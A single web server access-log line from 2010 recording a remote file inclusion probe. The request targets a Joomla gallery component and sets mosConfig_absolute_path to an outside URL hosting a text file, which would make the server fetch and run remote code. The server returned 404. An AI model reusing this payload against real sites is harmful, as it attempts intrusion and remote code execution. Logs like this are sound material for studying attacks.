194.110.160.78 - - [31/Jan/2010:21:35:23 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
